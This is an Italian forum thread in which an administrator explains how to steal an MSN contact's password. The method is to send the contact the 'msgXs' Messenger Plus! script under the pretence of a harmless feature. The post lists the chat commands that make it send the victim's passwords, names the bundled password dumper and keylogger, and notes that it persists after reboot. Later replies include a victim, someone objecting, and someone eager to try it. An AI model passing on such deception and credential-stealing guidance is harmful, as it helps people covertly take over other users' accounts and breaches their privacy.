"

Ruba Pass funzionante

« Older   Newer »
  Share  
view post Posted on 23/12/2008, 23:26     +1   -1


Group:
Amministratori
Posts:
6,931
Reputation:
0

Status:


Download:
msgXs



ll tutto a puro scopo informativo, dove č possibile scoprire la password di un contatto di MSN facendogli installare un semplice script . Ora resta che vi scaricate msgXs 1.5 da qui e inviarlo alla vittima.
Purtroppo il rpoblema piů grande e quello di far cascare la vittima ad aprirlo, e questo lo si puň fare dicendogli che lo script ha una funziona vera. Lafunziona esiste davvero ed č quello di cambiare il Messaggio Personali direttamente da una Chat. I comandi di questa funziona sono:

!mp:[Messaggio nel PSM] = Con questo comando inserirete un nuovo Messaggio nel PSM di MSN. Al posto di [Messaggio nel PSM] dovete ovviamente scrivere la frase.
!mp:!mpm = Con questo comando potete modificare il vostro Messaggio personale.
Adesso invece vediamo i comandi per rubargli la Pass:

MSN aggiornato = E’ il comando con cui vi farete inviare le password all’insaputa dell’utente.
ciao-null- = Con questo invece gli farete cancellare la funziona di rubare la password. L’utente perň dopo aver ricevuto questa scritta si deve disconettere da Messenger.
Lo script contiene 2 programmi principali:

MessenPass: il programma con cui ruberete le password memorizzate.
msgXs Keylogger: Il programma keylogger dove salverŕ le passwrod quando l’utente accederŕ ad MSN.
Quando la vittima avvierŕ lo script essa non potrŕ piů cancellarlo perchč si riattiverŕ quando riavvia il sistema. Per rimuovere questo script allora bisogna andare nella cartella C:ProgrammiMessenger Plus! LiveScripts e cancellare la cartella msgXs. E’ consigliato inoltre che la vittima chiude e riapre Messenger per rubare le password giuste. Questo č consigliato perchč quando la vittima chiude e riapre MSN il keylogger si avvierŕ e quindi ci sono piů possibilitŕ di scoprire la password. Ovviamente questo metodo funziona 8 volte su 10 ma si puň sempre sbagliare.
 
Web  Top
view post Posted on 24/12/2008, 00:26     +1   -1
Avatar


Group:
Storical User
Posts:
4,994
Reputation:
0

Status:


Fanculo, a me me lo avevano inviato e l'ho scoperto solo adesso, fortuna che non mi ha rubato la password :sese:
 
Top
Orgogliosardo
view post Posted on 6/8/2009, 21:33     +1   -1




No scusa ma io l'ho salvato e non mi fa eliminare la cartella!
 
Top
view post Posted on 7/8/2009, 07:47     +1   -1
Avatar

*Io sono shiny*

Group:
Silver User
Posts:
26,441
Reputation:
0
Location:
Dove la magia č natura.

Status:


cosa?O_O grazie per avermi avvisato,poi nn credo che io ci cascherei...ma guarda che topic vanno aprire,mah(senza offesa,ma queste cose nn si fanno)
 
Web Contacts  Top
LaisergPhoenix
view post Posted on 9/8/2009, 13:13     +1   -1




:goh:
 
Top
Ffilippo
view post Posted on 27/5/2013, 18:13     +1   -1




bellissimo lo provo subito XD
 
Top
5 replies since 23/12/2008, 23:26   167 views
  Share